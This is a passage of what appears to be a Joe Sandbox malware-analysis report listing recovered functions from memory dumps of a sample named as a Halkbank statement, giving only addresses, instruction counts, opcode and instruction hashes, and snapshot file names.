Opcode Fuzzy Hash: 3b03eb62fbdcaa249c2488adac7dea459b3feffc69686a9c4a4962f82e35e4ae
Instruction Fuzzy Hash: 6C51BE74A04605CFEB18CB68C8509FAB7BBFF85304B10886BD5879B261DBB1DC41CB92

Uniqueness

Uniqueness Score: -1.00%

Function 05E9CAF4 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd179bde2887e57ca2a2db747a294803c16cc8a404574e080f6928c006fa7b18
Instruction ID: 09fbb5d085974d0eb08d784c7cfaf669ece95017370e695b8eeac6434e84d6d2
Opcode Fuzzy Hash: cd179bde2887e57ca2a2db747a294803c16cc8a404574e080f6928c006fa7b18
Instruction Fuzzy Hash: A851AE34B002148FDB28EBB4D46466E77A7FFC5205B21486DD9869B3A5DF35DC02CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00E60968 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.930941672.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef1c6ded5fb91d0215fdf5f433af588067b78e25309847a7ecf1e1619c174971
Instruction ID: 5547f27183eeac70a5f7d7ede635cf3ad601ee239ae1a9baf14c46b80cb71a35
Opcode Fuzzy Hash: ef1c6ded5fb91d0215fdf5f433af588067b78e25309847a7ecf1e1619c174971
Instruction Fuzzy Hash: C161DF74E40218CFCB04CFA9D484AAEFBB2FF89344F25A569D805BB265DB30A941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05E98870 Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ad5d0f14c0ea809f99312fc3ac368c0b63ce68965eecf49f535d96b0d9cb3e3
Instruction ID: 4000fdabd1ccc7323f0f33e53fa5257368e30f65a42692ca6523bdabb04b0221
Opcode Fuzzy Hash: 3ad5d0f14c0ea809f99312fc3ac368c0b63ce68965eecf49f535d96b0d9cb3e3
Instruction Fuzzy Hash: A3515176600104AFCB459F94C844D69BBB7FF8D31470680E4E6099F276DB32DC62EB51

Uniqueness

Uniqueness Score: -1.00%

Function 05E9A320 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa90ec1c34f5bbafaff0615883f9b0d4d80a5d28760f63d7b5bf63c5230e23fa
Instruction ID: 00308728a3ea67648caaee7ab715a9b4a4ea6c838b015266b213e8a2dddc04c0
Opcode Fuzzy Hash: fa90ec1c34f5bbafaff0615883f9b0d4d80a5d28760f63d7b5bf63c5230e23fa
Instruction Fuzzy Hash: 6851CF74A00204DFDB18DFA4D898BAEB7F2FF85214F24947AE4869B651DB31DC41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 05DB9588 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45cb467e3e6c563a056d4299fc8c58fd690b1289acb6d871dedc8453a529afcd
Instruction ID: db64e979a2d2bcb37c6f53492f690256ff170a13af7144d3fb34af89f4829dbd
Opcode Fuzzy Hash: 45cb467e3e6c563a056d4299fc8c58fd690b1289acb6d871dedc8453a529afcd
Instruction Fuzzy Hash: 69512674E04249DBEB14DFA4D8A4BEEBBB3AF84305F10442AE503A7290DBB49945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05DB5F58 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 574a6c24e7017921d1a875ccde894fb1dceb2d2015360e765a362f25cec8db70
Instruction ID: fa327f1d058cd57e574c4a7d30f7cb1b39de2679e2da631f8fa3fc0c090c226f
Opcode Fuzzy Hash: 574a6c24e7017921d1a875ccde894fb1dceb2d2015360e765a362f25cec8db70
Instruction Fuzzy Hash: 7D51D535E0461ACFDB04CF99C8809EEFBB2BB88310F29C156D516AB345D675E881CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 05DB21F8 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e4f753302b5514d8aae90b75eec0c149526eca58bbdb523fd3c9591414e6aab
Instruction ID: 413aa4c54210a777006bfe2e522e880467d61ff594d8bb314fc01f5f1a9ce4e5
Opcode Fuzzy Hash: 8e4f753302b5514d8aae90b75eec0c149526eca58bbdb523fd3c9591414e6aab
Instruction Fuzzy Hash: CA4104353082409FE719ABB49CA06BE77A7FBC5314B04852EE187CB395DE759C0793A1

Uniqueness

Uniqueness Score: -1.00%

Function 05E99294 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 246576c69488bafe57fb9ab696f33c16766a30fc88b5e88c6d2f805210d16a62
Instruction ID: ae07fa213aad7f166f9581f1ad85898ab3a9b63b5fbb408e6497a61f79f93507
Opcode Fuzzy Hash: 246576c69488bafe57fb9ab696f33c16766a30fc88b5e88c6d2f805210d16a62
Instruction Fuzzy Hash: 9C4133706047408FE728EF75C49439ABBF6AF80318F008A2DD096CB7E6EB34D9458B91

Uniqueness

Uniqueness Score: -1.00%

Function 05E935B1 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2fb5b4cc8d2e10ff095c3e86b1d74977b6fbdfb1fa631e7d9fc33c23d11fd0e
Instruction ID: 815577794d22ff6cab0ba855c6a818cfb49c58569286edc704b24f2579d58833
Opcode Fuzzy Hash: e2fb5b4cc8d2e10ff095c3e86b1d74977b6fbdfb1fa631e7d9fc33c23d11fd0e
Instruction Fuzzy Hash: B8514C75E08248DFCF18DFA4D4809EDBBB3EF48300F20996AD946AB356EB759905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 05E95FD1 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d7a7c4ede6cdce5ffea45f97ae7e1b4d55c470ad511114488f5f09965b07a28
Instruction ID: e008f73a1fdeacc00de402876a7d9008346ea2b8e41ff014345473abb281c2c6
Opcode Fuzzy Hash: 0d7a7c4ede6cdce5ffea45f97ae7e1b4d55c470ad511114488f5f09965b07a28
Instruction Fuzzy Hash: A1412C35A00618DFEF28DFA5D8C4AAEB7B6FF44304F10902BE556A7250EB719C41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 05E95880 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f2046fc1a0b1cab4ab92d8b28b107139fdda2f797fed45d504b19f74a272416
Instruction ID: 950c8e0a116c4fff0a5e8cdb2bad485cb6dae7bf67a979a46f65a43ad3be80cf
Opcode Fuzzy Hash: 1f2046fc1a0b1cab4ab92d8b28b107139fdda2f797fed45d504b19f74a272416
Instruction Fuzzy Hash: 5531D571708217DBEF2FA62994246FE7297AFC5224B18647FD49B8B240FE718C015B41

Uniqueness

Uniqueness Score: -1.00%

Function 05DBB010 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30631d7709faeec831311c818b2d83989bf599446a4acc7d116f51a4cfa3c845
Instruction ID: debf3b08113e4110729d54638573e6c3589664266439229928717a6068620632
Opcode Fuzzy Hash: 30631d7709faeec831311c818b2d83989bf599446a4acc7d116f51a4cfa3c845
Instruction Fuzzy Hash: 46413D74E14219CFEB14CFA5C854AADBBB3FF89300F11851AD516AB355DBB0A885CB80

Uniqueness

Uniqueness Score: -1.00%

Function 05DB1D28 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bec4cbdcb2954c5b95382689eb2a9ec4be1f8292ad39d8f50c3439d09d322ec9
Instruction ID: 1980ae8fd27d8a3f3157b6fe7a17a83d5ae4998d88d45ea74808f6485a853bc6
Opcode Fuzzy Hash: bec4cbdcb2954c5b95382689eb2a9ec4be1f8292ad39d8f50c3439d09d322ec9
Instruction Fuzzy Hash: 6F312C31B08560CFE71587A988345BABFA7AFC3204F1985ABD196CB352C6B2CC06C791

Uniqueness

Uniqueness Score: -1.00%

Function 05DB83A8 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9101b92f6aa2d58cde6582d7b77eea0a843cde81de30889c51ddf8b4cfad0126
Instruction ID: f7cbc1c90b39d104fce065e16424a7aa6d77322e6466738111ca50983b5d773e
Opcode Fuzzy Hash: 9101b92f6aa2d58cde6582d7b77eea0a843cde81de30889c51ddf8b4cfad0126
Instruction Fuzzy Hash: CD41A270A04354CFCB05DF68C8A46DEBBF7FF89215F10486AD0839B261DBB4A949DB91

Uniqueness

Uniqueness Score: -1.00%

Function 05DB7CFF Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30baea10df36ae0f913319b4136446e5a854a9bc6198ab864ad0ad1ea5f5e203
Instruction ID: cfeb0cae855ab63c892094371bcbaf93d06f5770119bc77d33b5e93603c1de73
Opcode Fuzzy Hash: 30baea10df36ae0f913319b4136446e5a854a9bc6198ab864ad0ad1ea5f5e203
Instruction Fuzzy Hash: 7B31CC31308150EFC715AB69D8A46BEBBA7EFC2614B45486FE086CF311CF60AD0587D2

Uniqueness

Uniqueness Score: -1.00%

Function 05DB3ED8 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0faf7c6fa4860c2baeffa7a3e3a0c6c33cf8dc4a34043b1b2ddf0a40f1ff903
Instruction ID: 2b594b74130fb67a9ef090ae6a56bbf04763631cd06e0e88a42d733384122cf0
Opcode Fuzzy Hash: c0faf7c6fa4860c2baeffa7a3e3a0c6c33cf8dc4a34043b1b2ddf0a40f1ff903
Instruction Fuzzy Hash: 4731B53060C245DFEB05CB64CC549B9BBB3EF49204F5589ABE48B8B252C771ED01DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00E60471 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.930941672.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aed029edad95c5303208d099e4b656e4c5e944693607734f2daae0a470361088
Instruction ID: b871e108896b660bd50012c3ad188808896688c9f2b6315e7f60ad66d2c7d221
Opcode Fuzzy Hash: aed029edad95c5303208d099e4b656e4c5e944693607734f2daae0a470361088
Instruction Fuzzy Hash: 1A414B34D00218CFDB14EFA0D490AEEBBB2EF89304F208929D515AB365DB359946DF91

Uniqueness

Uniqueness Score: -1.00%

Function 05DBE3F0 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0ebc967c525211693c4fad5e2308fc37e3092499d72f7539cad6fd0ea4bde15
Instruction ID: 7c3c81f7b132234396ed315f52ed0fecf4cdd580c957981c893a966553a9fc28
Opcode Fuzzy Hash: f0ebc967c525211693c4fad5e2308fc37e3092499d72f7539cad6fd0ea4bde15
Instruction Fuzzy Hash: 8631C032708214CFEB14DA69D8449E977EBEB8521471480B7E94BCB266DBB1CC42D3A3

Uniqueness

Uniqueness Score: -1.00%

Function 05DB7ED9 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 548bca1e832a2ad8ef1a4e2fa3aac1db88e7a768a9cfa47f89d1786e61f75f66
Instruction ID: ca2d06d9252930d636f967327c7829261edf2c17eedc4249cc444ec3873ce23f
Opcode Fuzzy Hash: 548bca1e832a2ad8ef1a4e2fa3aac1db88e7a768a9cfa47f89d1786e61f75f66
Instruction Fuzzy Hash: B0318D31A04206DFCB04DFA8C8909EEBBF6FF89314B15846AE456DB711E730ED469B94

Uniqueness

Uniqueness Score: -1.00%

Function 05E9A510 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1a2de346646832bb8d99bb4de85d02985e6db0b632abeb40571c141221327c0
Instruction ID: d294737e704007d424311aa0a66457f8ef1935c764c75991ceb91b0f2e41ed87
Opcode Fuzzy Hash: e1a2de346646832bb8d99bb4de85d02985e6db0b632abeb40571c141221327c0
Instruction Fuzzy Hash: 2C416D75A002198FDF18DFA9D844ABEBBB2FF88314F01853AD991D7251EB34D946CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00E60480 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.930941672.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d65d5aaa34e9c09e31cf4e9cc286145afe66a64503e48645056243849cfaf053
Instruction ID: efa6aa76a5e6e2a8bcd053015b664b965fccac5ff77ef02e53579964d278d773
Opcode Fuzzy Hash: d65d5aaa34e9c09e31cf4e9cc286145afe66a64503e48645056243849cfaf053
Instruction Fuzzy Hash: FC411A34D002089FDB04EFE0D450AEEBBB6FF89304F108829D515A7364DB359956DF91

Uniqueness

Uniqueness Score: -1.00%

Function 05DB5AF8 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 006d04869f32e9b173df97c9e7183de4d000857743d911e94b063397e5a39959
Instruction ID: 56271a148a4ba310475ddfe40d4119cb63520b5063a76568b6944ba36f8ad304
Opcode Fuzzy Hash: 006d04869f32e9b173df97c9e7183de4d000857743d911e94b063397e5a39959
Instruction Fuzzy Hash: BD31F332709205CFE710CB55F984FA5BBB7FB86226B1480A7E54ACB611E7B1D842C758

Uniqueness

Uniqueness Score: -1.00%

Function 05DB2248 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 438d10debaf8c6fcc01d0e8acccb0588f05907b930f22cd729f118e25f664ddb
Instruction ID: a11eedbf6dbe26fe6b8b26f38f30b0f628cc20a4b859365b6a216a58723cdf02
Opcode Fuzzy Hash: 438d10debaf8c6fcc01d0e8acccb0588f05907b930f22cd729f118e25f664ddb
Instruction Fuzzy Hash: 8131D839304104EBE718A7B59CA067FB59BFBC9311B04852DE587C7384CE759C0293A1

Uniqueness

Uniqueness Score: -1.00%

Function 05DB33E4 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0b431842e19d65b28c34ec2cdc4394ba0b59875adc7483cfd3e8c006993d65f
Instruction ID: e6fe91357966ade635ac3593d21bab9ed3fec0b93155d5b36cb1b74bc28ef871
Opcode Fuzzy Hash: d0b431842e19d65b28c34ec2cdc4394ba0b59875adc7483cfd3e8c006993d65f
Instruction Fuzzy Hash: 2A31C435208600DFE721DEA5FD40BEB77A7FB84612F40485BE58B87950E6A1E8018B53

Uniqueness

Uniqueness Score: -1.00%

Function 05E91690 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 834ed18ec5bfa084d4a144f882872da88bd7c4c197bdafe1ba2cdf2b501b6d68
Instruction ID: 41254283bf26da5094143d1429bf195e0da04ae6394c648e15a55809a056f038
Opcode Fuzzy Hash: 834ed18ec5bfa084d4a144f882872da88bd7c4c197bdafe1ba2cdf2b501b6d68
Instruction Fuzzy Hash: 94316B35B1424AEBCF18DFA4D890AEEBBF6AF89200F045469E542AB351DB71D901CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05DBBF28 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 657bdfc44474c555b4cb2c6755e715101e26a1f64b9d055c468a61dc1e795ae7
Instruction ID: 9a9c7f733bc2e4dbecea92263bf8cc2ea5e78a50753d0ab868e1383102d64c43
Opcode Fuzzy Hash: 657bdfc44474c555b4cb2c6755e715101e26a1f64b9d055c468a61dc1e795ae7
Instruction Fuzzy Hash: 94315C76710125DFDB10DB69D804B99BBA6EB88711F1140A7EA06DB261D672EC41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05E91CE0 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90de3ad7544641915a7e07f343e1558942d1fef8431c9983b8122b71ffd4581d
Instruction ID: 129c2194e739beddf629cf34a579e498f438939bc1594ee82b6f101b3cf6fe01
Opcode Fuzzy Hash: 90de3ad7544641915a7e07f343e1558942d1fef8431c9983b8122b71ffd4581d
Instruction Fuzzy Hash: 2E3107B8B046099FEB08CF59C484EAE77F7FB88219F2084A4E5459B361D731ED11CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05DB83E0 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1672e62f98ca466e05eb6c6bfacb21cfa5146f4c577d9f605fb48fca1f9092ca
Instruction ID: bc3e21d5cf9c44ea8319d4bb86e639656fb9561e2240a230536656e57605e20a
Opcode Fuzzy Hash: 1672e62f98ca466e05eb6c6bfacb21cfa5146f4c577d9f605fb48fca1f9092ca
Instruction Fuzzy Hash: 45316F70A10618CBDB14DF65C894AEEBBF7FF88315F10482AD043AB360DBB4A945DB91

Uniqueness

Uniqueness Score: -1.00%

Function 05E91988 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5934dc35535fb15064e7cf82a3cb0c48ffd20af0d3d7514c488a6af8ad0aeb51
Instruction ID: ee544dc67be0c60c161eeda61483ee010792effbafacf514680568818d9b1f74
Opcode Fuzzy Hash: 5934dc35535fb15064e7cf82a3cb0c48ffd20af0d3d7514c488a6af8ad0aeb51
Instruction Fuzzy Hash: 3721F6317087039FDB2DDB69D8409B6B7EBEB84344B14956BF08BC7611EA60EC02C761

Uniqueness

Uniqueness Score: -1.00%

Function 05E934B0 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 148e1f7964a0dba43979a17b71634c6bbddca07132832b3814ea35e7b1eeaf69
Instruction ID: b876429f89134babb35943ba29601fbfce2198980667fe85f91c111f9e7b8ebe
Opcode Fuzzy Hash: 148e1f7964a0dba43979a17b71634c6bbddca07132832b3814ea35e7b1eeaf69
Instruction Fuzzy Hash: 0A21F034708215CFEF1D9B7484147BD7BA7AB8E226F1458AFD4C7CB691EA35C8418711

Uniqueness

Uniqueness Score: -1.00%

Function 05E9B429 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935402455.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cca1733bd61e62308a8fbc89553ec2c2915612f8b3da26d46fb50659ca24cbcd
Instruction ID: e47480e8d1add904abceb27b732c7568ab800aab1aa751ccd6df78b8ddd53906
Opcode Fuzzy Hash: cca1733bd61e62308a8fbc89553ec2c2915612f8b3da26d46fb50659ca24cbcd
Instruction Fuzzy Hash: 76411774B012188FEB68DF24DC85FA9B7B6AF48320F1051E5E949AB391DA30ED85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 05DA1AB3 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935330029.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5da0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea000cfa143ca6a8ddf3ce7818ba8ea0aecb0f09b77be615d320cc15068d369
Instruction ID: f008736890dc383c78f132a9a525c6437fe36149a3a5c4d3edc01eea09850827
Opcode Fuzzy Hash: bea000cfa143ca6a8ddf3ce7818ba8ea0aecb0f09b77be615d320cc15068d369
Instruction Fuzzy Hash: 6231F271E002298FC714DFA8C408A9AFBF6AF89301F6984AAD441BB241D7719C49CB92

Uniqueness

Uniqueness Score: -1.00%

Function 05DBD030 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4bd69d9a08b884889ef6f04fa48971fc2de8bd73d09b0f18c475b73618ffd18
Instruction ID: 598a1024334cce97faa8fbfa24f8401ccc490eace45104042b05722b8d62c233
Opcode Fuzzy Hash: b4bd69d9a08b884889ef6f04fa48971fc2de8bd73d09b0f18c475b73618ffd18
Instruction Fuzzy Hash: 60219331308240DFE714FB39C824BBAB7E7AF85210F55406BE5878B361CAB6DC828761

Uniqueness

Uniqueness Score: -1.00%

Function 05DB5500 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.935340225.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5db0000_Halkbank_Ekstre_20220128_081138_756957 (1).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04a1a4db7d77f4c87f43df58418b3e0fe2822256bbc0ff14d1c64b07bdc01ee8
